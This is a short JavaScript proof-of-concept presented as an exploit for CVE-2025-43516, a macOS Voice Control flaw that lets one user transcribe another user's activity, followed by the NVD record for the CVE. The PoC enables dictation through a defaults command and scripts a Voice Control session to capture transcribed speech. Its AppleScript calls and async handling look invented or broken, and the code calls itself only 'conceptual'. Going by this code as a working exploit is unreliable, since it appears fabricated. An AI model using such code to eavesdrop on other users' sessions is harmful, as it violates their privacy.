CVE-2025-43516

// CVE-2025-43516 PoC - macOS Voice Control Session Hijacking // This PoC demonstrates how Voice Control can be exploited to transcribe other user activities const { exec } = require('child_process'); const applescript = require('applescript'); // Step 1: Check if Voice Control is enabled function checkVoiceControlStatus() { return new Promise((resolve, reject) => { const script = ` tell application "System Events" tell speech preferences get properties end tell end tell `; applescript.execString(script, (err, result) => { if (err) reject(err); else resolve(result); }); }); } // Step 2: Attempt to access Voice Control session data async function exploitVoiceControl() { try { // Enable Voice Control if not already enabled await exec('defaults write com.apple.speech.recognitiond \'AppleDictationEnabled\' -bool true'); // Attempt to capture audio stream from active sessions const script = ` tell application "Voice Control" activate set currentSession to make new session set transcriptionResult to listen for words return transcriptionResult end tell `; applescript.execString(script, (err, result) => { if (!err) { console.log('[+] Transcribed content:', result); console.log('[+] Session data captured successfully'); } }); } catch (error) { console.error('[-] Exploitation failed:', error.message); } } // Note: This is a conceptual PoC. Actual exploitation requires: // 1. Local access to macOS system // 2. Voice Control feature enabled // 3. Another active user session on the system // 4. Proper entitlements and permissions exploitVoiceControl();

{"cve": {"id": "CVE-2025-43516", "sourceIdentifier": "[email protected]", "published": "2025-12-12T21:15:56.340", "lastModified": "2026-04-02T19:20:58.387", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A session management issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7.3, macOS Sonoma 14.8.3, macOS Tahoe 26.2. A user with Voice Control enabled may be able to transcribe another user's activity."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-384"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.8.3", "matchCriteriaId": "8E37DC2A-33E6-480B-8DFE-4F6558F0A895"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.3", "matchCriteriaId": "3428C860-E02D-4FE9-96F4-58EEAAB8321D"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125886", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125887", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125888", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}